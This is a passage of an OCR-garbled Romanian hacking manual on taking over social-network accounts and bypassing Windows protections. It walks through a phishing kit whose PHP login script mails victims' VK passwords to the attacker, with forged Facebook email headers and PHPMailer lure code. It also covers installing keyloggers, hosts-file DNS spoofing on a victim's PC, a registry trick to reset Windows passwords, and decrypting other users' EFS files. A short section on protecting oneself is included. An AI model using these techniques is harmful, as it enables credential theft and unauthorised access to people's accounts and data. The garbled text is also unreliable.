Cinput type="hidden" name="ip h" value="f f eec f "> cinput type="hidden" name="lg h" value=" f еѲ с "> Cinput type="hidden" name="ul" id="quick login ul" value=""> Telefon sau e-mail napcxnb "cinput type="submit" class="submit"> Codul la care trebuie să fii atent este îngroșat: • https://login vk com/?ast=login - script de conectare care procesează datele de conectare și parola introduse Lui formularul nostru îi transmite datele • e-mail este autentificarea (e-mailul) utilizatorului • trece - și aceasta este parola utilizatorului Deci, trebuie doar să schimbăm scriptul de conectare în login php: Acum formularul va trimite toate datele către scriptul login php Trebuie să fie plasat în același director ca index html Codul pentru acest script este prezentat în Lista Lista Cod script Login php Înțelegem că cel mai probabil nu cunoașteți limbajul de programare PHP Să încercăm să-l mestecăm cât mai detaliat posibil În primul rând, scriptul nostru primește datele din formular Deoarece formularul nostru folosește metoda POST (vezi method="post" în codul formularului), folosim matricea $ POST Dacă întâlniți un formular ciudat care trimite un nume de utilizator și o parolă folosind metoda GET, atunci trebuie să căutați datele în matricea SGET În continuare, folosim funcția mail() pentru a trimite valorile introduse de utilizator către e-mailul dumneavoastră Nu ne-am prostit cu anteturile scrisorii, așa că scrisoarea poate ajunge în dosarul Spam Verificați-l periodic pentru parolă Sau puteți încerca să vă introduceți numele de utilizator și parola pentru a verifica formularul, găsiți litera în dosarul Spam și marcați-o ca nespam În acest caz, e-mailurile nu vor mai ajunge în Spam În plus, pentru ca utilizatorul să nu bănuiască nimic, îl redirecționăm către pagina principală de conectare VK De fapt, asta-i tot Obțineți o autentificare și o parolă, iar utilizatorul nu bănuiește nimic, continuă să folosească VK în continuare Metoda este potrivită pentru cazurile în care nu trebuie să resetați parola victimei Phishing-ul este o metodă bună și nu este deloc dificilă din punct de vedere tehnic Dar diavolul este în detalii Succesul acestui eveniment va depinde de cât de bine implementați totul De exemplu, în cazul nostru: • Pentru a economisi timp, nu am publicat o poză cu un smartphone pe pagina de conectare Aceasta este o articulație Nu chiar atât de evident, dar unii utilizatori ar putea observa • De asemenea, nu am folosit un site cu SSL Vă rugăm să rețineți că există un semn de exclamare lângă pictograma VPN Se spune că HTTPS nu este utilizat Aceasta este, de asemenea, o înțepătură Trebuie să cumpărați cel mai ieftin certificat sau să fixați un certificat Let's Encrypt gratuit Veți afla instrucțiunile finale de la hosterul de la care ați cumpărat găzduire pentru tot acest lucru • Multe depind de numele de domeniu pe care îl cumpărați Cât de asemănător va fi cu numele rețelei, pagina în care doriți să piratați Desigur, există mulți utilizatori proști și unii pot pur și simplu să nu acorde atenție adresei, dar nu doriți ca utilizatorul să observe falsul, nu? • Trebuie acordată o mare atenție scrisorii, care are scopul de a atrage utilizatorul către o pagină falsă Trebuie să o falsificați complet, până la cel mai mic detaliu, inclusiv anteturile scrisorii Modul de falsificare a antetelor de e-mail a fost discutat în capitolul De exemplu, pentru Facebook, anteturile arată astfel: $headers = 'De la: Facebook ' ,"\r\n" "Răspuns la: noreply " "\r\n"; mail($to, $subiect, $mesaj, $anteturi); Notă De ce este important să falsificăm titlurile? Da, pentru că unii utilizatori sortează mesajele din rețelele sociale Acestea ajung într-un folder specific din interfața programului de e-mail Dacă scrisoarea ajunge într-un alt dosar, atunci ai făcut o greșeală chiar de la început, fără a începe nimic Cu o probabilitate de %, putem spune că utilizatorul nu va urma linkul din e-mailul tău Codul scrisorii pe care o trimite rețeaua de socializare poate fi obținut prin vizualizarea mesajului original în programul de e-mail Înregistrează-te în rețeaua de socializare, pagina în care vrei să piratezi Deschideți un e-mail dintr-o rețea socială Poate fi necesar să așteptați până când rețeaua vă trimite e-mailul care se potrivește scopului dvs De exemplu, când cineva va fi adăugat ca prieten sau când prietenul tău are o zi de naștere Deschide scrisoarea originală De exemplu, în interfața GMail, trebuie să faceți clic pe cele trei puncte din colțul din dreapta sus și să selectați comanda Afișare originală * Igzhmmi "soi chg> n" e x? S O a gp/iii qooqk rtjrn - - S c(c)lld" il d feb s bb ff f Content-Type: text/html ; charset-',UTF- " Content-Transfer-Encodiog: citat-printabil facebook gmedia aii și (max-width-: px){*fclass] ib t{ain-width: % !iaportantp[class],lb row{dlsplay:bloc k ! important}*[class] ib ext{displsy:block important;paddlng: px px - ;vertical-align:top importantzwidth: % !ieportant}*[class] ib i"ig,*[cl -ssj ib "id{vertical-align:top Ii"portetit}*[class] nb blk{dlsplay: block !ip-ortant;paddlng-bottcm: px;width: % *ieiportant}* [class] " b hide{ di splay:n-one !important}*[clasa] "& inl{display:inline leportant}*(class] d mb flex-{display:block !isțxx tant}} d "ib shom{display:none) d "b flex{display:flex}" Pmedîa numai ecran și (yah-dispozitiv) lățime: px){ d "tb hlde{display:none ?ia*)ortant} d ab show(display:block important} d mb flexțdisplay:block !important}} "tbtext hl, "b text h , eb text h , mbtext h , mb text h , mb text-h {line-height:normal} ■t work text hl{font-sixe: px;line-height:norma ;•" argin-top: px} mb work text h , mb work text h {font-size: px;llne-height:-normal;nargin-top: px} aib worktext h , mb work text hS, mbworktext h {fo-nt-size: px;line-height:norwul} mb work text a{color:# e ) mb work text-p{margln-top: px] ' style- D Xtable border- £>" " cellspacing- D-" " cellpadding- D~ " align" O"center" style- D "border-collapse:collapse;'*>-ctrxtd width= D" " align- "center" style- D""xbody style-lb'max-width:- px;margin: auto;" dir- O"ltr" bgcolor- D"#ffffff"xtable border- £>" " \r\n" "Tip de conținut: text/html; set de caractere=utf- \r\n" G "X-Mailer: ZuckMail [versiunea ] ); Să ne dăm seama ce este aici și de ce Fișierul cu scrisoarea dvs ar trebui să fie numit mes-sage html și plasat în același director ca și fișierul index html Vom stoca codul literei separat de codul scriptului PHP are reguli complexe pentru codificarea textului în e-mailuri pe care un începător nu dorește să le explice În plus, el va avea întotdeauna ocazia să încurce și să greșească, așa că o greșeală este exclusă Schimbați adresa de e-mail hacker@example org cu adresa dvs personală Veți rula acest script de câte ori aveți nevoie, până când sunteți sigur că rezultatul arată într-adevăr ca originalul Schimbați subiectul cu unul care se potrivește mesajului dvs Dacă această notificare este despre ziua de naștere a unui prieten, atunci va fi un subiect, dacă despre altceva, atunci un alt subiect Schimbați și antetele e-mailului Acum sunt date pentru Facebook ZuckMail [versiunea ] este numele mailer-ului Facebook Dacă piratați o altă rețea socială, uitați-vă la mailer-ul pe care îl folosesc Diavolul este în detalii - amintește-ți asta Unele interfețe de e-mail vă pot pune e-mailurile în spam din cauza unor astfel de fleacuri Cu cât titlurile dvs sunt mai detaliate, cu atât mai bine Desigur, aceste titluri ar trebui să fie cât mai asemănătoare cu originalul Iată un exemplu de anteturi Facebook (acestea nu sunt toate anteturi, ci cele pe care le puteți pune jos, deoarece unele anteturi pot fi modificate doar de sistemul de e-mail și utilizatorul nu le poate influența în niciun fel): Către: adresa destinatarului Subiect: Subiect X-Priority: X-Mailer: ZuckMail [versiunea ] De la: Facebook Răspuns-către: noreply Erori-Către: notification@facebookmail porumb X-Facebook-Notifу: birthday reminder; mailid= b af acc d G af faalb aG b afe ba Gla Lista-Dezabonare: Feedback-ID: O:birthday reminder:Facebook X-FACEBOOK-PRIORITY: X-Auto-Răspuns-Suprimare: Toate Versiunea MIME: Seturi de caractere înfricoșătoare precum b af acc d G af faalb aG b afe- ba Gl sunt UUID-uri Pentru ca scrisoarea dvs să arate ca originala, trebuie să generați un fel de UUID în scriptul pentru trimiterea mesajului Aici puteți alege două opțiuni - schimbați manual ID-ul și înregistrați-le static în anteturile de e-mail Sau puteți utiliza biblioteca PHP pentru a genera UUID-ul și a automatiza acest proces Apoi, fiecare e-mail nou pe care îl trimiteți va avea propriul său UUID Pentru a face acest lucru, utilizați următorul script (fișa ) Lista Script de generare UUID toString() "\n"; // adică e eaaaf -dl -Hel-b e - cdd // Versiunea (pe baza titlului și MD ) $uuid = Uuid::uuid (Uuid::NAMESPACE DNS, 'php net'); echo $uuid ->toString() "\n"; // adică Ila b a-b da- f- -a a // Versiunea (set de caractere aleatoriu) $uuid = Uuid::uuid (); echo $uuid ->toString() "\n"; // adică c c-d d- bfe-ba -e ee f e a // Versiunea (bazată pe nume și SHA ) $uuid = Uuid::uuid (Uuid::NAMESPACE DNS, 'php net'); echo $uuid ->toString() "\n"; // adică c a a -dbcf- -a d - a bdlb } catch (UnsatisfiedDependencyException $e) { // În caz de eroare // folosind un sistem pe de biți Sau absența bibliotecii Moontoast\Math echo 'Excepție prinsă: ' $e->getMessage() "\n"; } Puteți descărca biblioteca în sine, care este direct implicată în generarea UUID-urilor, de la https://github com/ramsey/uuid Pentru o generare mai convenabilă a antetului și trimiterea de mesaje în format HTML, puteți utiliza biblioteca PHPMailer: https://github com/PHPMailer/PHPMailer Această bibliotecă vă permite nu numai să trimiteți mesaje în format HTML, ci și mesaje cu atașamente Poate că, atunci când piratați conturi sociale, nu veți avea nevoie de această oportunitate Dar este necesar în multe alte locuri La un cearșaf arată un exemplu de trimitere a unui mesaj cu un atașament Lista Trimiterea unui mesaj cu un atașament setFrom('from@example corn', 'First Last'); // Setați antetul Răspuns la $mail->addReplyTo('replyto@example corn', 'Primul Ultimul'); // Adăugați adresa $mail->addAddress('whoto@example corn', 'John Doe'); // Setați subiectul e-mailului $mail->Subiect = test'; // Adăugați codul HTML al literei $mail->msgHTML (file get contents ( 'contents html' ) t DIR ) ; // Adăugați o versiune text simplu a e-mailului (opțional) $mail->AltBody = 'Acesta este corpul mesajului în text simplu'; //Adăugați un atașament - o imagine $mail->addAttachment('images/phpmailer mini png'); // Trimite mesajul și verifică erori dacă (!$mail->send()) { echo 'Eroare: ' $mail->ErrorInfo; } altfel { echo "E-mail trimis!"; } Keyspy Această metodă este probabil cea mai ușoară dintre toate Constă în instalarea unui keylogger pe computerul victimei Un keylogger este un program care înregistrează tot ceea ce utilizatorul introduce de la tastatură într-un fișier special sau îl trimite hackerului prin e-mail, de exemplu, când fișierul atinge o anumită dimensiune sau după ce a trecut un anumit timp, să spunem o dată o zi Această metodă are o mulțime de dezavantaje: • Aveți nevoie de acces fizic la computerul victimei pentru a instala programul spyware Îl poți trimite într-o scrisoare - ca link sau ca atașament, dar în % din cazuri, antivirusul (fie sistemul de mail, fie cel instalat pe computerul victimei) va începe să tragă un semnal de alarmă Toate keyloggerele existente sunt recunoscute de antivirusuri ca viruși sau spyware (spyware) Deci va trebui să dezactivați antivirusul în timpul instalării, iar după instalarea spionului, adăugați-l la excluderea antivirus Totul va dura aproximativ minute dacă faci totul rapid Dar în aceste minute victima ar trebui să lipsească de pe computer Potrivit numai dacă există acces personal, de exemplu, acesta este un computer de acasă sau computerul unui coleg • Înregistratorii de taste, cu excepția parolelor, scriu într-un fișier tot ce introduce victima Uneori, acesta este mult text și puteți petrece o zi sau chiar mai mult pentru a înțelege ce a introdus victima • Este posibil ca victima să nu introducă deloc o parolă Poate fi salvat în browser Prin urmare, puteți obține tot ce a introdus victima, dar cu excepția parolelor! În același timp, desigur, veți citi textul tuturor mesajelor trimise de victimă, dar scopul nu va fi atins În general, un keylogger nu este cea mai bună soluție pentru a pirata o pagină dintr-o rețea de socializare, dar ca una dintre opțiuni, poate fi folosit Falsificarea DNS Destul de dificilă, pe de o parte, metoda Dacă sunteți atât de cool încât vă puteți implementa propriul server DNS pe router, care ar redirecționa cererea pentru numele de domeniu vk com (sau oricare altul) unde aveți nevoie de el (la site-ul dvs fals), atunci credem că nu ai nevoie de aceasta carte! Dacă nu sunteți așa de cool, atunci deschideți fișierul hosts ca administrator pe computerul victimei Se află în C:\Windows\System \drivers\etc Formatul acestui fișier este: Adresă IP nume domeniu Notați adresa IP a găzduirii dvs unde se află pagina falsă astfel: Adresa IP vk com Salvați fișierul și la linia de comandă introduceți comanda: ipconfig /flushdns Când victima introduce adresa vk com, va fi dusă pe pagina ta falsă Veți primi parola, dar această metodă are dezavantaje După o astfel de înlocuire, utilizatorul va ajunge la pagina dvs , va introduce un login și o parolă, le veți primi, dar utilizatorul nu va mai putea intra pe VKontakte, deoarece fiecare dintre solicitările sale va fi redirecționată către pagina dvs Utilizatorul va suspecta cu siguranță ceva Cum să te protejezi de hacking Și acum să vorbim despre cum să te protejezi de piratarea unei pagini de pe o rețea socială, astfel încât tu însuți să nu cazi în cârligul hackerului: • Metoda - cea mai ușoară - nu porniți pagini din rețelele sociale Dacă aveți nevoie de informații care pot fi găsite acolo, creați mai multe conturi false Chiar dacă sunt sparte, nu vei pierde nimic • Metoda - protejați-vă de phishing În primul rând, încercați să nu faceți clic pe linkurile din e-mail din rețeaua socială Puteți vizita oricând site-ul folosiți versiunea mobilă pentru a vedea cine vă scrie Când vi se cere să introduceți un nume de utilizator și o parolă, acordați atenție adresei site-ului Dacă diferă de vk com (VKontakte), facebook com (Facebook), my mail ru (Lumea mea), ok ru (Odnoklassniki) și alte adrese obișnuite, părăsiți această pagină Ei bine, sau puteți introduce un e-mail fictiv și o parolă fictivă - lăsați hackerul să sufere! • Metoda - protecție împotriva accesului fizic la computer - asigurați-vă că setați întârzierea minimă pentru blocarea ecranului ( - minute), setați și o parolă pentru contul dvs Da, nu va fi atât de convenabil să lucrați, dar în câteva minute, cât sunteți plecat, nimeni nu va putea să instaleze software pe computer sau să facă modificări în configurația sistemului • Metoda - autentificarea cu doi factori și mindfulness - cheia succesului Ca în cântec - Ai grijă, fii atent! Autentificarea cu doi factori nu va permite unui hacker să preia imediat pagina dvs , chiar dacă vă cunoaște numele de utilizator și parola De asemenea, va avea nevoie de un cod pentru a intra în pagină Și nu poate decât să atragă un astfel de cod de la tine Dacă hackerul este unul dintre rudele tale, este posibil ca el să poată (în timp ce ești plecat) să ia în posesia telefonului tău și să citească codul din SMS-ul de pe el Așa că nu uitați să vă protejați gadgeturile Deși, dacă o persoană este foarte apropiată, atunci nici măcar o amprentă nu te va salva - în timp ce dormi, el va putea să intre pe telefonul tău și să-și facă toate faptele murdare Dar este mai bine să nu lași astfel de oameni lângă tine, mai ales când dormi • Doar un sfat - folosiți diferite adrese de e-mail - pentru corespondență și pentru înregistrarea într-o rețea socială Chiar dacă cineva ajunge la adresa dvs principală (deși nu știu ce este mai rău - pierderea accesului la e-mail sau la rețeaua socială), nu va putea să pirateze pagina rețelei sociale prin intermediul acesteia Capitolul Schimbarea parolelor și obținerea accesului la date criptate Protecția prin parolă rămâne cea mai relevantă chiar și în Da, există tot felul de metode de securitate biometrică (scanere retiniene, scanere faciale (cum ar fi FaceID pe iOS), scanere de amprente), dar toate sunt mai puțin comune decât parolele obișnuite Acest capitol va lua în considerare nu numai resetarea parolelor Windows , ci și continuarea sa logică - obținerea accesului la datele criptate (cu de obicei totul este simplu și nu este interesant) ale utilizatorului Resetați parola Windows Nu trebuie să fii un hacker pentru a sparge securitatea Este suficient doar să restabiliți corect computerul Așadar, să ne imaginăm că există un computer cu Windows Poate fi un computer de acasă la care lucrezi nu doar tu, ci și cei dragi, sau un computer de serviciu Mai devreme sau mai târziu, vine un moment când cineva își uită parola (poate chiar ești tu!) Cum să nu ajuți o persoană în acest moment dificil? Resetați parola cu PowerShell Windows vă permite să vă conectați în același timp în mai multe moduri, de exemplu, nu numai cu o parolă, ci și cu o amprentă, PIN sau recunoaștere facială Dacă aveți o astfel de oportunitate, folosiți-o și apoi resetați parola uitată în acest fel: Apăsați Windows + X și selectați Windows Power Shell (Administrator) Introduceți comanda net user nume de utilizator parola nouă Codul de acces uitat va fi înlocuit cu unul nou Notă Această metodă funcționează numai cu parole locale, nu cu Microsoft Live eu ' Unii cititori pot obiecta - cum ai acces la sistem? De fapt, sfatul este conceput pentru ca dvs să ajuți alți utilizatori să-și recupereze parola și să nu o ridice de la zero Dar drepturile de administrator? Ce este acolo de ascuns - uită-te la lista de conturi de pe computerul tău - oriunde te uiți - toți administratorii Deci, în acest fel, ei vă pot ridica parola și trebuie să vă amintiți acest lucru Dacă sunteți utilizatorul principal, atunci nu trebuie să creați conturi cu drepturi de administrator, altfel parola dvs va fi "recuperată" mai întâi, iar apoi este o chestiune de tehnologie Puteți vedea ce fișiere deschideți, ce site-uri vă uitați (mai ales dacă nu ați urmat instrucțiunile din Capitolul ) și așa mai departe Schimbarea parolei cu Lazesoft Recuperați parola mea Și acum să complicăm puțin sarcina Imaginați-vă că nu avem acces la computer și nu cunoaștem o singură parolă, adică autentificarea în sistem este în general exclusă (nici ca utilizator, nici ca administrator) Protecția prin parolă în Windows lasă mult de dorit Acest lucru este confirmat de cât de ușor îl resetează programele terțe De exemplu, să luăm utilitarul Lazesoft Recover My Password Descărcați și instalați Lazesoft Recover My Password pe alt computer, la care ai acces Deschideți programul și conectați unitatea flash la computer (sistemul o va formata, deci nu lăsa nimic important pe el) Faceți clic pe Burn Bootable CD/USB Disk Now! și urmați instrucțiunile programe Introduceți unitatea flash în computerul blocat și reporniți-o Apăsați tasta Del, F , F , F , FI sau F la pornire (normal dorit dar este afișat pe ecran), deschideți BIOS-ul și porniți computerul de pe unitatea flash - se va numi Lazesoft Live CD (EMS Enabled) Dacă există o parolă pentru intrarea în BIOS, opriți computerul, deschideți carcasa și scoateți bateria timp de aproximativ minute Acest lucru este suficient pentru ca BIOS-ul să uite toți parametrii, inclusiv parola setată Cu laptopuri, totuși, acest truc nu va funcționa - sunt mult mai greu de dezasamblat Selectați opțiunea Recuperare parolă și urmați instrucțiunile programului Notă Puteți descărca programul de la https://www iazesoft com/forgot-windows-admin-password-recovery-freeware html și este complet gratuit Vă rugăm să rețineți: aceasta și alte utilitare similare nu vor funcționa dacă sistemul este instalat pe o unitate criptată folosind instrumentul BitLocker încorporat De asemenea, este imposibil să extragi date de pe o astfel de unitate Cu toate acestea, există o modalitate de a face acest lucru, despre care vom discuta mai târziu în acest capitol Resetați parola Windows prin modul de recuperare Această metodă este complicată, dar nu necesită programe suplimentare Funcționează numai cu conturi locale, nu cu conturi Windows Live Veți avea nevoie de un disc sau o unitate flash cu o imagine de instalare Windows , cum să o faceți este scris aici: https://remontka pro/rufus- -bootable-usb/ Pe scurt, descărcați imaginea ISO cu Windows pe torrent sau de pe site-ul oficial, apoi utilizați utilitarul Rufus (https://rufus ie/) pentru a crea un disc bootabil Toate acestea se pot face pe orice computer la care aveți acces Nici măcar nu este necesar să aveți Windows - un computer cu Windows este suficient pentru a crea un disc de pornire, adică orice, chiar și un computer vechi, va face Orez Utilitatea Rufus Apoi, mergeți la computerul "țintă" și reporniți, așa cum este descris în sfatul anterior Intrați în BIOS apăsând Del, F , F , F , F sau F Alegeți să porniți de pe o unitate flash Apoi procedați conform următoarelor instrucțiuni: Când apare interfața de configurare Windows , apăsați Shift + F sau Shift + Fn + FIO - pe unele laptopuri dacă prima combinație nu funcționează Se va deschide un prompt de comandă Tastați comanda regedit și apăsați Enter Editorul de registru se va lansa În editorul de registry care se deschide, selectați folderul HKEY LOCAL din dreapta MAȘINĂRIE Apoi alegeți comanda de meniu File, Load Hive * Deschideți calea către fișierul C:\Windows\System \config\SYSTEM În modul de recuperare, numele unităților pot fi confundate, de exemplu, unitatea C este afișată ca E Acest lucru este normal Puteți afla pe ce unitate aveți folderul Windows uitându-vă la conținutul acestuia Sistemul vă solicită să introduceți un nume pentru stupul de registry Introduceți orice nu se potrivește cu cele existente, cum ar fi coolhacker, și faceți clic pe OK Deschideți folderul HKEY LOCAL MACHINE din panoul din stânga, în el - coolhacker și în el - secțiunea Configurare Găsiți parametrul CmdLine, faceți dublu clic și în câmpul Value introduceți cmd exe, faceți clic pe OK Apoi, într-un alt parametru SetupType (este mai jos), specificați valoarea și faceți clic din nou pe OK Selectați folderul coolhacker din panoul din stânga și selectați comanda de meniu File, Unload hive Închideți toate ferestrele și reporniți computerul Scoateți unitatea flash astfel încât să pornească ca de obicei La repornire, sigla sistemului nu va apărea În schimb, se va deschide un prompt de comandă Introduceți numele utilizatorului net newpassword și parola va fi schimbată cu cea specificată de dvs Dacă trebuie să eliminați parola cu totul, utilizați comanda nume de utilizator net "" (două ghilimele fără spații sau alte caractere) Apasa Enter Introduceți comanda regedit și deschideți secțiunea HKEY LOCAL MACHINE/Sys-tem/Setup În parametrul CmdLine șterge cmd exe, în parametrul SetupType setați valoarea la Reporniți computerul Apoi vă puteți conecta cu o nouă parolă sau fără ea Pic Linia de comandă la instalarea Hlndows Orez Editorul Registrului Ce s-a întâmplat? Mai întâi, am forțat sistemul țintă să afișeze linia de comandă la pornire în loc să încarce interfața obișnuită Deoarece niciun utilizator nu s-a autentificat încă, promptul de comandă s-a deschis deja cu drepturi de administrator Tot ce trebuie să faceți este să utilizați comanda net user pentru a vă reseta parola Asta e tot! Mulți utilizatori cred că criptarea va ajuta la protejarea împotriva spargerii parolelor Următoarele două secțiuni vă vor arăta cum să accesați fișierele criptate cu EFS și chiar BitLocker Va exista multă teorie, dar fără ea nu îți vei putea îndeplini planul Obținerea accesului la fișierele criptate cu EFS Ce este EFS? În Windows (începând cu Windows și cu excepția edițiilor Home), sistemul de fișiere de criptare (EFS) este utilizat în mod tradițional pentru a organiza criptarea transparentă Înainte de a sparge EFS, trebuie să vorbim despre avantajele și dezavantajele acestuia Sistemul de fișiere EFS este conceput pentru a împiedica un utilizator să acceseze fișierele (criptate) ale altui utilizator De ce a fost necesar să se creeze EFS dacă NTFS acceptă controlul accesului? Deși NTFS este un sistem de fișiere destul de sigur, de-a lungul timpului au apărut diverse utilitare (una dintre primele a fost NTFSDOS, care vă permite să citiți fișierele aflate pe o partiție NTFS dintr-un mediu DOS), ignorând permisiunile NTFS Era nevoie de protecție suplimentară O astfel de protecție trebuia să fie EFS Notă Opțional, puteți ocoli permisiunile NTFS pornind de pe un USB bootabil Linux De asemenea, Linux citește foarte bine NTFS și nu-i pasă de permisiunile setate Este posibil să nu puteți modifica fișierul, dar este ușor de citit De fapt, EFS este un add-on pentru NTFS Sistemul de fișiere EFS este convenabil deoarece este inclus cu Windows și nu aveți nevoie de niciun software suplimentar pentru a cripta fișierele - tot ce aveți nevoie este deja în Windows De asemenea, nu este nevoie să faceți niciun pas preliminar pentru a începe criptarea fișierelor, deoarece prima dată când un fișier este criptat, un certificat de criptare și o cheie privată sunt generate automat pentru utilizator Un alt avantaj al EFS este că atunci când mutați un fișier dintr-un folder criptat în oricare altul, acesta rămâne criptat, iar atunci când copiați un fișier într-un folder criptat, acesta este criptat automat Nu este nevoie să faceți niciun pas suplimentar Această abordare, desigur, este foarte convenabilă și utilizatorului i se pare că EFS este singurul beneficiu Dar nu este În circumstanțe nefavorabile, utilizatorul poate pierde complet accesul la fișierele criptate Egoul poate apărea în următoarele cazuri: • Probleme hardware, cum ar fi defecțiunea plăcii de bază, bootloader corupt, fișiere de sistem corupte din cauza defecțiunii hard diskului (sectoare proaste) Drept urmare, hard disk-ul poate fi conectat la un alt computer pentru a copia fișiere de pe acesta, dar dacă sunt criptate cu EFS, nu veți reuși • Sistemul a fost reinstalat Windows poate fi reinstalat din mai multe motive În acest caz, accesul la datele criptate, desigur, se va pierde • Profilul utilizatorului a fost eliminat Chiar dacă creați un utilizator cu același nume, i se va atribui un alt ID, iar datele nu vor fi tot decriptate • Administratorul de sistem sau utilizatorul a resetat parola După aceea, accesul la datele EFS se va pierde și el • Transfer incorect al utilizatorului pe alt domeniu Dacă transferul utilizatorului este efectuat incorect, acesta nu va putea accesa fișierele sale criptate Când utilizatorii (în special începătorii) încep să folosească EFS, puțini oameni se gândesc la asta Dar, pe de altă parte, există un software special (și va fi demonstrat mai târziu în lucrare) care vă permite să accesați date chiar dacă sistemul a fost reinstalat și unele chei s-au pierdut Și nici măcar nu știu dacă acest fapt poate fi atribuit avantajelor sau dezavantajelor - acest software vă permite să restabiliți accesul la date, dar, în același timp, poate fi folosit de un atacator pentru a obține acces neautorizat la fișierele criptate S-ar părea că datele criptate folosind EFS sunt foarte fiabile La urma urmei, fișierele de pe disc sunt criptate folosind cheia FEK (File Encryption Keu), care este stocată în atributele fișierului FEK în sine este criptat cu o cheie principală, care, la rândul său, este criptată cu cheile utilizatorilor de sistem care au acces la acest fișier Cheile utilizatorului sunt criptate cu hash-urile parolei acestor utilizatori, iar hash-urile parolei sunt, de asemenea, criptate cu SYSKEY Un astfel de lanț de criptare trebuia să ofere o protecție fiabilă a datelor, dar totul se reduce la o autentificare și o parolă banale Odată ce utilizatorul resetează parola sau reinstalează sistemul, nu va mai fi posibil să acceseze datele criptate ^ Dezvoltatorii EFS au jucat în siguranță și au implementat agenți de recuperare (EFS Recovery Agent), adică utilizatori care pot decripta datele criptate de alți utilizatori Cu toate acestea, utilizarea conceptului EFS RA nu este foarte convenabilă și chiar dificilă, mai ales pentru utilizatorii începători Drept urmare, acești utilizatori începători știu cum să cripteze fișierele folosind EFS, dar nu știu ce să facă în caz de urgență Este bine că există un software special care poate ajuta în această situație, dar același software poate fi folosit și pentru accesul neautorizat la date, așa cum sa menționat deja Dezavantajele EFS includ imposibilitatea criptării rețelei (dacă aveți nevoie, atunci trebuie să utilizați alte protocoale de criptare pentru datele transmise prin rețea, de exemplu, IPSec) și lipsa suportului pentru alte sisteme de fișiere Dacă utilizatorul copiază un fișier criptat într-un sistem de fișiere care nu acceptă criptarea, cum ar fi FAT/FAT , fișierul va fi decriptat și poate fi vizualizat de oricine Nu este nimic surprinzător în asta, EFS este doar un supliment pentru NTFS Se pare că EFS face mai mult rău decât bine Dar, pentru a nu fi nefondat, următorul va fi un exemplu de utilizare a programului Advanced EFS Data Recovery pentru a obține acces la date criptate Scenariul va fi cel mai simplu: mai întâi, ne vom autentifica ca alt utilizator și vom încerca să accesăm un fișier criptat care a fost criptat de un alt utilizator Apoi, se va simula o situație reală când certificatul utilizatorului care a criptat fișierul a fost șters (acest lucru se poate întâmpla, de exemplu, dacă reinstalați Windows) După cum se va arăta, programul va face față acestei situații fără probleme Dar mai întâi trebuie să ne dăm seama cum să activăm criptarea EFS Activați criptarea EFS Procesul de activare a criptării este prezentat în Fig Pentru a demonstra acest lucru, am creat folderul C:\Files Apoi, trebuie să faceți clic dreapta pe acest folder, selectați comanda Proprietăți, în fereastra care apare, faceți clic pe butonul Altele și în fereastra Atribute suplimentare, activați atributul Criptare conținut pentru a proteja datele De asemenea, puteți dezactiva opțiunea Permiteți indexarea conținutului fișierelor din acest folder pe lângă proprietățile fișierului - nu este nevoie să indexați conținutul datelor secrete http://www elcomsoft ru/aefsdr html ' ] Utilizarea Advanced EFS Data Recovery pentru a decripta fișierele criptate EFS Să vedem cum puteți decripta fișierele criptate cu EFS Primul pas este să activați criptarea pentru unul dintre dosare Dosarul Fișiere din secțiunea anterioară a fost creat special în scopuri demonstrative În folderul criptat (Fig ) a fost adăugat un fișier text "parole", al cărui conținut vom încerca să îl vedem conectându-ne ca alt utilizator Pentru test, a fost creat un alt utilizator cu drepturi de administrator (astfel de drepturi sunt necesare programului ElcomSoft Advanced EFS Data Recovery (AEFSDR)), vezi fig Pic Conținutul folderului criptat cont Microsoft X Creați un cont pentru acest computer Cine va folosi acest computer? Dacă doriți să utilizați o parolă, alegeți ceva ușor de reținut pentru dvs și greu de ghicit pentru alții Orez A fost creat un utilizator nou Desigur, dacă vă autentificați ca alt utilizator și încercați să citiți fișierul "parole", nu va rezulta nimic (Fig ) Orez Acces interzis Dar nu contează - lansăm programul Advanced EFS Data Recovery și trecem imediat la modul Expert (puteți folosi, desigur, vrăjitorul care se deschide la prima pornire (Fig )), dar prefer modul expert X Expertul AEFSDR exprtmods Bun venit la Expert avansat pentru recuperarea datelor EFS Rwilt you ihfough Mts procwss otlocatog aii *"**►-:> weerferl for dscrypbon of your tifos, aad foe actual tfocrypftoc procesa D ] arată xlbbhJ rt (r)fjo eu**" eu Pic Expert la pornirea Advanced EFS Data Recovery ÎP Advanced EFS Deta Recovery Tn*l Edition - □ X Scan Qptions He'P Pic Modul avansat EFS de recuperare de date Expert Deci, accesați fila Fișiere criptate și faceți clic pe butonul Scanare fișiere criptate În primul rând, programul vă va solicita să găsiți cheile După ce cheile sunt găsite, faceți clic din nou pe butonul Scan for encrypted files, pentru a căuta direct fișiere criptate Pe fig rezultatul scanării este deja afișat - singurul nostru fișier criptat C:\Gі e \passwords хі a fost găsit Selectați-l și apăsați butonul Decriptare Programul vă va solicita să selectați directorul în care doriți să decriptați fișierele (Fig ) Pic S-au găsit fișiere criptate Prezentare generală a maxilarului X Selectați folderul în care fișierele decriptate vor fi incluse !■ Desktop > MbOneDrive > ț Hacker > Acest computer > r" Biblioteci > f Rețea Trimite pmw Eu OK I Anulez Pic Selectați directorul în care fișierele vor fi decriptate Deoarece am folosit versiunea de încercare a programului, pentru a continua, trebuie să faceți clic pe Continuare (Fig ) Fișierele decriptate sunt plasate în subfolderul AEP DECRYPTED (Fig ) Acum să complicăm sarcina programului Advanced EFS Data Recovery, și anume, ștergerea certificatului personal Conectați-vă ca utilizator care a creat folderul criptat, lansați consola sshs și deschideți lista de certificate personale (trebuie să selectați comanda File, Add or Remove snap-in și adăugați snap-in Certificates) Comanda acuml Utilizați versiunea de încercare a AEFSDR Primii octeți ai fișierului au fost decriptați Restul fișierului a fost completat cu zerouri Trebuie să achiziționați versiunea fuB a AEFSDR pentru a decripta fișierul completei/ Vă rugăm să exrrnlne programul Help pentru a afla mai multe despre limitările versiunii de încercare Puteti achizitiona versiunea completa a programului nght tn, onhne sau offiîne - stfnpty verifica butonul "Comandă FuB Verston" Acceptăm carduri de credit majore (online, telefon sau fax), comenzi de cumpărare, ctieds și transfer Pagina de comandă pe un server securizat, asigurându-vă că informațiile dvs confidențiale rămân confidențiale Comanda Veiston complet" Introduceți codul de înregistrare Continua Pic Faceți clic pe butonul "Continuați" Pic Fișierul decriptat și conținutul fișierului "parole M" Ștergeți-vă certificatul personal Veți vedea un avertisment că nu va mai fi posibilă decriptarea datelor criptate cu acest certificat Ei bine, vom verifica în curând Apoi, faceți următoarele: • Închideți snap-ul și încercați să accesați fișierul criptat Nu veți reuși, în ciuda faptului că recent ați criptat personal acest 